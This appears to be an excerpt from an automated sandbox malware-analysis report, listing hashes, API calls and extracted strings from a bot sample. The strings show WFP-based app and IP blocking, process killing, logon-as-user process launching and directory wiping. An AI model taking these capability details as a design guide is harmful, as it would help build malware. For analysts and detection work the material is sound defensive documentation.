                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                    • API String ID: 2918714741-1670302297
                                    • Opcode ID: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
                                    • Instruction ID: 110d6e81682869a742e3e3c0be2adc03cb7a01ae18e827a14f9d85458213acc1
                                    • Opcode Fuzzy Hash: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
                                    • Instruction Fuzzy Hash: B021B432A48642CAE3A0AF15E8407A9BBA0BB44784F844133EE4C977F0CF3DD855D722

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1
                                    • API String ID: 513531256-1839485796
                                    • Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                    • Instruction ID: 4b713902ab65686d24d4e2faecd786f9aad5c965529f66ccaf6585348c4f4057
                                    • Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                    • Instruction Fuzzy Hash: 3E419425A8C64186F360BB11E8603BAEAD0BB84780FC44137DA0DA77F5CF3DE5658726

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                                    • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                                    • API String ID: 1522850966-2029202777
                                    • Opcode ID: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
                                    • Instruction ID: a01a9d7288e5f8b533721d1a6d46e64719024f3e35f9825ab8fda5baa743815b
                                    • Opcode Fuzzy Hash: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
                                    • Instruction Fuzzy Hash: F651C836658B8184F7B0AB06F4503BAB7A6FB40780F404236DA8D57BA9EF3DD490D791
                                    APIs
                                    • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,0000025BBA7C14D0,?,00007FF7E3CE14B4,?,?,00000001,00007FF7E3CE14D2), ref: 00007FF7E3CE9701
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Close0EngineFwpmwcscmp
                                    • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                                    • API String ID: 4239307310-774261742
                                    • Opcode ID: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
                                    • Instruction ID: 310a482fc80e27dac9b1d955086076fb54b7b87f4ec3c94bd5663315a9b2ccdd
                                    • Opcode Fuzzy Hash: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
                                    • Instruction Fuzzy Hash: 6431C251B5C20341FAD0BA56A5903B99AA46F443C0FC00233EA0EE76F5DE7CD845A223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
                                    • Instruction ID: ae6ca06cda65a8f4d7ee40f4a547b4db30b9e8477b0ba049dd71d33b5a4047ac
                                    • Opcode Fuzzy Hash: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
                                    • Instruction Fuzzy Hash: D1211B51EAD44382FBF1B66AD444379D9405F0070AFE64633E11EE92F8CE3CE8A56263
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
                                    • Instruction ID: 1f4e9d906a808c3c4271ffd2917f3004748145dc50e6c04a0cb00b69462418ca
                                    • Opcode Fuzzy Hash: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
                                    • Instruction Fuzzy Hash: 50F0A250A8861281FA91A756E8113B5AE916F04BC0F944133DC5C6B7F4EF3CE9629323
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
                                    • Instruction ID: 6d35713eaf1300dfede9f45dbcba7532b3ddb9dc7712072026eaec6d1049ace7
                                    • Opcode Fuzzy Hash: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
                                    • Instruction Fuzzy Hash: 72F04492A88B0785FAE477169890378AE957F45B44FC04133C50EE62F5DE3CE454A322
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
                                    • Instruction ID: 554469f5960aa8295999edea0c66cb767a06f9c0f26a2ebb98cce758b13e419a
                                    • Opcode Fuzzy Hash: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
                                    • Instruction Fuzzy Hash: 3DF06892A8CB0785FAE477169890378AF957F45B44FC04133C50EE62F5DE3CE450A322
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
                                    • Instruction ID: f35962127b92292fd0309e3006ed505f131da67c4a88dcefaf10e1695487d190
                                    • Opcode Fuzzy Hash: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
                                    • Instruction Fuzzy Hash: 0CF06892A8CB0785FAE477169890378AF957F45B44FC04133C50EE62F5DE3CE450A322
                                    • API ID: CloseErrorHandleLastNextProcess32
                                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                    • API String ID: 1692733154-1215713629
                                    • Opcode ID: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
                                    • Instruction ID: 82f92313e368d4c37654cb5b8f4b7ae8b8d14fc38fe12ab79fa8a9075f97b787
                                    • Opcode Fuzzy Hash: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
                                    • Instruction Fuzzy Hash: E8F04492A8CB0785FAA477169890378AE95AF45B44FC04133C50EE62F5DE3CE550A322
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                    • API String ID: 4085810780-3386190286
                                    • Opcode ID: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
                                    • Instruction ID: 995cf1de078664b34d8bddaf57cda142673496a81ccd686097f05067b3a25e44
                                    • Opcode Fuzzy Hash: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
                                    • Instruction Fuzzy Hash: 22F06D14E89A0740E995BB96E8507B09E906F15780F885133C81C7A3F0EE7CE5658322
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction ID: a0d46e0bb737ed5338424a1ca7d825dd37f1137a7f3b0ad90a50d8b28a0472b6
                                    • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                    • Instruction Fuzzy Hash: 2DF0B413B88A0311F9D2BA06B4507B99A411F80761E8907338D0C6A7E1ED3CD893A222
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction ID: b80da7a41bb85d097d010027fd1655213dfad704491142b105cbfff2e20cc45d
                                    • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                    • Instruction Fuzzy Hash: 8BF0B413B88A0311F9D2BA06B4407B99A412F80761E8906338D0C6A7E0DD3CD893A222
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction ID: 510a1ee0f68f346dfe16cd05c9a8c47cff8248a8c1f24bf114f176afef6cee2c
                                    • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                    • Instruction Fuzzy Hash: 88F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D0C6A7E0DD3CD893A222
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction ID: 0203711ab5d3a2dff0a6725b8d3f146e9ae1c6e50c2f9408fba441e924679871
                                    • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                    • Instruction Fuzzy Hash: DEF0B413B88A0351F9D2BA06B4407B99A411F80761E890633CD0C6A7E0DE3CE893A222
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction ID: 4274a45109ab0f2ed210680a8b7a95ada9642b17b0f07136d70c750a90bc0784
                                    • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                    • Instruction Fuzzy Hash: A3F0B413B88A0311F9D2BA06B4407B99A411F80761E8906338D1C6B7E1DD3CD893A222
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                                    • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                                    • API String ID: 1842180197-3127737957
                                    • Opcode ID: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
                                    • Instruction ID: 175e3d62bce902a9df2aa8c67dfc0a4c131184d9dbe2330f9559af3799f9f182
                                    • Opcode Fuzzy Hash: 94ee048e8bd45c9939ad3021e88a51864f09f1642a4dc8886498fadcceeff011
                                    • Instruction Fuzzy Hash: 1E1270A198C64281F6B0BB02E8503B9EB90BB44784FD40237D94EA76F5DF7CE545A323
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 4253334766-1535167640
                                    • Opcode ID: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
                                    • Instruction ID: 6d61bc024677e8557b940ad38ab4051adc0aeb85724be78f545781ddda04fe91
                                    • Opcode Fuzzy Hash: ff5049e7108b4606d8b9015f043b98a799f56cb1b49ebe0a8e8aeeddf7da304e
                                    • Instruction Fuzzy Hash: 5E611D61E8C55395FAE0B716A8113B8DA606F00354FD40273E85EAB2F0DE7CF856A363
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                    • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                    • API String ID: 2123903355-2019010457
                                    • Opcode ID: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
                                    • Instruction ID: 8c8d60de9d54476edcc694eee1cbfd5e482d41b4c2a60a406d9e6f09d57775eb
                                    • Opcode Fuzzy Hash: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
                                    • Instruction Fuzzy Hash: 7C413E756482468AE790EF29E450679BBE0FB08754F900233DA2CA37E4EB3CE450DB12
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                    • API String ID: 384173800-4041758303
                                    • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                    • Instruction ID: d643e16e67964fa21f44fee9c80b9305a657757f256adc93920f8afc654cafc4
                                    • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                    • Instruction Fuzzy Hash: 73F0BD24E9AA1790ED85B712FC602B4EBE4AF48745BC50133C90D663B4EF3DE1798322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: fflushfwriteinet_addrntohl
                                    • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                                    • API String ID: 3255839625-58178811
                                    • Opcode ID: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
                                    • Instruction ID: 320310c588b5db09f0f7c461fb3c39f18bd4d89c4e45e8ee039349e5e06301e1
                                    • Opcode Fuzzy Hash: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
                                    • Instruction Fuzzy Hash: 8D51803260CBC585E7719B25B4403EABBA5EB95780F804135D6CC8BBA9EF3CC195CB51
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID:
                                    • API String ID: 2086374402-0
                                    • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                    • Instruction ID: cfcbb3ba5b7a0e136df41fa1d0280e11c419cfaa570f2a9aadf04900064033f0
                                    • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                    • Instruction Fuzzy Hash: 64E022A272880583EF60D60AE4407BBAB91C79C394F904130E91EC3BA4DA3CD9628B40
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmp
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 253c9fb1a9a9a6b2d406ad64c93e81b9ce91d3770f92f8c83c255d7155b27596
                                    • Instruction ID: 83022f27c5258dec9e13d66f02c86ce9599dcbc6cd02bdbfde3fdbf6332d44db
                                    • Opcode Fuzzy Hash: 253c9fb1a9a9a6b2d406ad64c93e81b9ce91d3770f92f8c83c255d7155b27596
                                    • Instruction Fuzzy Hash: A5415D97D8EAC54AF7D26D784D7E2386FD0ABA17007CD807BC344566E3AA69E8144333
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                    • Instruction ID: 44d23ee426d279dbe13ab575164d5b70112a49102c2eba2da26862a72092d275
                                    • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                    • Instruction Fuzzy Hash: 8EA002129CDC0AC4EA881F00E811271A96CEB06700FC42131C128620A58B3CD0108115
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                                    • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                                    • API String ID: 3326156344-4160762685
                                    • Opcode ID: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
                                    • Instruction ID: e41e3bd26dfa1e9fe1c7803aa0bcc312d4c53722c580a96036ae004f9d412b0a
                                    • Opcode Fuzzy Hash: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
                                    • Instruction Fuzzy Hash: 42F12256E8C30782FAF47656A890378DB50AF14754ED01233C61EA62F1DE7DED85B223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                    • API String ID: 2460052984-4087913290
                                    • Opcode ID: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
                                    • Instruction ID: c8a3f68bd27fadacc3b542ac766d039c81c0e4bd666c64ae5c69eadf6889cbc1
                                    • Opcode Fuzzy Hash: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
                                    • Instruction Fuzzy Hash: 6FA1C52198C68285F6A0BB06E9203F9EBA1AF80745FD40133D50EA76F5DF3DE5099763
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: strlen$strcatstrcpy$strcmp
                                    • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                    • API String ID: 2140730755-3699962909
                                    • Opcode ID: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
                                    • Instruction ID: a26a8a93c41bae9876591207930fc4958c86e9d6378888076e63c41c64326109
                                    • Opcode Fuzzy Hash: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
                                    • Instruction Fuzzy Hash: 18C1F76298C68681F6B0B702E5503F9EBA1AF44784FC40133DA4EA66E5DF7CE509D723
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                                    • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                                    • API String ID: 3826151639-1775164968
                                    • Opcode ID: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
                                    • Instruction ID: afef5c8074e25bc2af6f27f5085256f4b500ab6aa4a0649f7ce404704bfb60a8
                                    • Opcode Fuzzy Hash: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
                                    • Instruction Fuzzy Hash: C9919322E8C54285FAE07706E46437CDA92AF84795FD50233D50EA72F1DE3CE895A363
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    Similarity
                                    • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
